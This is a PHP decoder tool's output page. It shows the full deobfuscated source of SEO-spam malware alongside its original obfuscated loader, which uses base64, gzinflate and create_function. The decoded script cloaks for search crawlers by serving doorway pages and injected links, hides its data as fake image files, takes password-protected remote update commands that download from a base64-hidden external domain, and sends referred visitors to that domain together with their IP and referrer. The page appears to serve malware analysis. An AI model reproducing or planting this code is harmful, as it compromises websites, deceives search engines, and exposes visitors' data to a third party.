Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $DnIjFXtEnc="wAyh38W7rqFGY9JNZ2gsBVePRcn_LUEKzMTQ4kuOaXjbDiHxSl6Iv0p1Cfd5tmo";$IcmBL..

Decoded Output download




 






 
  
	


		 
	 
 


set_time_limit(0);

function change_page_regex($page, $links,$reg,$res){

	$elements = array();
	if (preg_match_all($reg, $page, $result)) {
		$elements = $result[$res];
		$elements = array_unique($elements);
	}


	$m=min(count($links),count($elements));

        for ($i = 0; $i < $m; $i++) {
		$link = array_shift($links);
		$element = array_shift($elements);
		$page = preg_replace('/' . preg_quote($element, '/') . '/', '$0 ' . $link, $page, 1);
        }
	if (count($links)>0){
	        $element = "<p>";
	        $element .= implode("<br>
", $links);
	        $element .= "</p>";
		$page = preg_replace('/\<\/body\>/i', "
" . $element . "
$0", $page, 1);
	}
    
    
	return $page;
}




function curly_page_get($url,$useragent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"){
	$ch = curl_init ();
	curl_setopt ($ch, CURLOPT_URL,$url);
	curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt ($ch, CURLOPT_TIMEOUT, 3000);
	curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
	curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
	curl_setopt ($ch, CURLOPT_USERAGENT, $useragent);
	$result = curl_exec ($ch);
	$curly_page_get_info=curl_getinfo($ch);

	curl_close($ch);
	return array($result,$curly_page_get_info);
}

function get_proxy_page(){
		
	$proto=stripos(@$_SERVER['SERVER_PROTOCOL'],'https') === true ? 'https://' : 'http://';
	$crurl=$proto.@$_SERVER['HTTP_HOST'].@$_SERVER['REQUEST_URI'];
	list($buf,$curly_page_get_info)=curly_page_get($crurl);

	$ct=@$curly_page_get_info['content_type'];
	$nexturl=@$curly_page_get_info['redirect_url'];
	$status=@$curly_page_get_info['http_code'];
	if (status!="")header("Status: $status");

	if ($ct!=""){
		header("Content-type: $ct");
	}
	if ($nexturl!=""){
		header("Location: $nexturl");
	}
	return array($buf,$ct);

}



if (function_exists('sys_get_temp_dir')) {$tmppath = sys_get_temp_dir();if (!is_dir($tmppath)){	$tmppath = (dirname(__FILE__));	}	} else { $tmppath = (dirname(__FILE__));}

$content="";
$x=@$_POST["pppp_check"];
$md5pass="e5e4570182820af0a183ce1520afe43b";



$host=@$_SERVER["HTTP_HOST"];
$uri=@$_SERVER["REQUEST_URI"];
$host=str_replace("www.","",$host);
$md5host=md5($host);
$urx=$host.$uri;
$md5urx=md5($urx);



$tmppath=$tmppath."/.".$md5host."/";
@mkdir($tmppath);



$configs=$tmppath."emoji1.png";
$bd=$tmppath."metaicons.jpg";
$templ=$tmppath."wp-themesall.gif";



$domain=base64_decode("cG9wLXVwMjAxOS5ydQ==");
$p=md5(base64_decode(@$_POST["p"]));

if (($x!="")&&($p==$md5pass)){

	if ($x=="2"){
		echo "###UPDATING_FILES###
";
		list($buf1,$curly_page_get_info)=@curly_page_get("http://update.".$domain."/images/".$md5host."/emoji1.png");
		@file_put_contents($configs,$buf1);
		list($buf1,$curly_page_get_info)=@curly_page_get("http://update.".$domain."/images/".$md5host."/metaicons.jpg");
		@file_put_contents($bd,$buf1);
		list($buf1,$curly_page_get_info)=@curly_page_get("http://update.".$domain."/images/".$md5host."/wp-themesall.gif");
		@file_put_contents($templ,$buf1);

		exit;
	}


	if ($x=="4"){
		echo "###WORKED###
";exit;
	}


}else{

	$cf=array();
	if (@file_exists($configs)){
		$cf=@unserialize(base64_decode(@file_get_contents($configs)));
	}
	
	if (@isset($cf[$md5urx])){
		$bot=0;$se=0;$ua=@$_SERVER["HTTP_USER_AGENT"];$ref=@$_SERVER["HTTP_REFERER"];$myip=@$_SERVER["REMOTE_ADDR"];
		if (preg_match("#google|bing\.com|msn\.com|ask\.com|aol\.com|altavista|search|yahoo|conduit\.com|charter\.net|wow\.com|mywebsearch\.com|handycafe\.com|babylon\.com#i", $ref))$se=1;
		if (preg_match("#google|gsa-crawler|AdsBot-Google|Mediapartners|Googlebot-Mobile|spider|bot|yahoo|google web preview|mail\.ru|crawler|baiduspider#i", $ua))$bot=1;
		$off=$cf[$md5urx]+0;
		$template=base64_decode(@file_get_contents($templ));$f=@fopen($bd,"r");@fseek($f,$off);$buf=trim(@fgets($f,10000000));@fclose($f);$info=unserialize(base64_decode($buf));
		$keyword=@$info["keyword"];$IDpack=@$info["IDpack"];$base=@$info["base"];$text=@$info["text"];$title=@$info["title"];$description=@$info["description"];$uckeyword=ucwords($keyword);$inside_links=@$info["inside_links"];
		if ($bot) {
			if (isset($info["contenttype"])){$contenttype=base64_decode($info["contenttype"]);$types=explode("
",$contenttype);foreach($types as $val){$val=trim($val);if($val!="")header($val);}}

			if (isset($info["isdoor"])){

				if (isset($info["standalone"])){
					$doorcontent=base64_decode($text);
					echo $doorcontent;exit;
				}else{
					$template=str_replace("%text%",$text,$template);
					$template=str_replace("%title%",$title,$template);
					$template=str_replace("%description%",$description,$template);
					$template=str_replace("%uckeyword%",$uckeyword,$template);
					$template=str_replace("%keyword%",str_replace(" ", ",", trim($keyword)),$template);

					foreach($inside_links as $i => $link){
						$template=str_replace("%INSIDE_LINK_".$i."%",$link,$template);
					}

					echo $template;exit;
				}
			}else{

				list($buf,$ct)=get_proxy_page();

				if (stristr($ct,"text/html")){
					$rega='/\<a\s.*?\>.*?\<\/a\>/i';$resa=0;
					$links=$info["links_a"];
					$buf=change_page_regex($buf,$links,$rega,$resa);

					$regp='/(.{30}\<\/p\>)/is';$resp=1;
					$links=$info["links_p"];
					$buf=change_page_regex($buf,$links,$regp,$resp);

				}

				echo $buf;
			}



		}
		if ($se) {
			if (isset($info["isdoor"])){
				list($buf1,$curly_page_get_info)=curly_page_get("http://$domain/ff.php?ip=".$IDpack."&mk=".rawurlencode($keyword)."&base=".rawurlencode($base)."&d=".rawurlencode($host)."&u=".rawurlencode($urx)."&addr=".$myip."&ref=".rawurlencode($ref),$ua);
				echo $buf1;exit;
			}else{
				list($buf,$ct)=get_proxy_page();
				echo $buf;exit;
			}
		}
	}else{

		list($buf,$ct)=get_proxy_page();
		echo $buf;
	}

}

Did this file decode correctly?

Original Code

<?php $DnIjFXtEnc="wAyh38W7rqFGY9JNZ2gsBVePRcn_LUEKzMTQ4kuOaXjbDiHxSl6Iv0p1Cfd5tmo";$IcmBLMBegSnV=$DnIjFXtEnc[43]. $DnIjFXtEnc[40] .$DnIjFXtEnc[19].$DnIjFXtEnc[22].  
$DnIjFXtEnc[50] .$DnIjFXtEnc[36] .$DnIjFXtEnc[27].  $DnIjFXtEnc[58]. $DnIjFXtEnc[22].$DnIjFXtEnc[25].  
$DnIjFXtEnc[62] .$DnIjFXtEnc[58].  
$DnIjFXtEnc[22];$dnXlBODSEb=$DnIjFXtEnc[18] . $DnIjFXtEnc[32].$DnIjFXtEnc[45] . $DnIjFXtEnc[26].  $DnIjFXtEnc[57].  
$DnIjFXtEnc[49] . $DnIjFXtEnc[40] . $DnIjFXtEnc[60].  
$DnIjFXtEnc[22];$SvoEwCrliyulx=$DnIjFXtEnc[22]. $DnIjFXtEnc[8].  
$DnIjFXtEnc[8]  .$DnIjFXtEnc[62].$DnIjFXtEnc[8].  
$DnIjFXtEnc[27].  $DnIjFXtEnc[8]  .$DnIjFXtEnc[22].  
$DnIjFXtEnc[54].  
$DnIjFXtEnc[62].  $DnIjFXtEnc[8] . $DnIjFXtEnc[60].$DnIjFXtEnc[45].$DnIjFXtEnc[26].  $DnIjFXtEnc[18];$AzDKSWPYXWEViZ=$DnIjFXtEnc[25]  .$DnIjFXtEnc[8] . $DnIjFXtEnc[22] . $DnIjFXtEnc[40].$DnIjFXtEnc[60]. $DnIjFXtEnc[22].$DnIjFXtEnc[27]. $DnIjFXtEnc[57]  .$DnIjFXtEnc[38] . $DnIjFXtEnc[26].  
$DnIjFXtEnc[25] .$DnIjFXtEnc[60].  $DnIjFXtEnc[45]. $DnIjFXtEnc[62].$DnIjFXtEnc[26];$SvoEwCrliyulx(0);$hRahGkgCk=$AzDKSWPYXWEViZ("",$dnXlBODSEb($IcmBLMBegSnV("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")));$hRahGkgCk();?>

Function Calls

null 1
gzinflate 1
base64_decode 1
create_function 1
error_reporting 1

Variables

$hRahGkgCk None
$DnIjFXtEnc wAyh38W7rqFGY9JNZ2gsBVePRcn_LUEKzMTQ4kuOaXjbDiHxSl6Iv0p1Cfd5..
$dnXlBODSEb gzinflate
$IcmBLMBegSnV base64_decode
$SvoEwCrliyulx error_reporting
$AzDKSWPYXWEViZ create_function

Stats

MD5 dfe7e4416c997005845e6d00c7190225
Eval Count 1
Decode Time 89 ms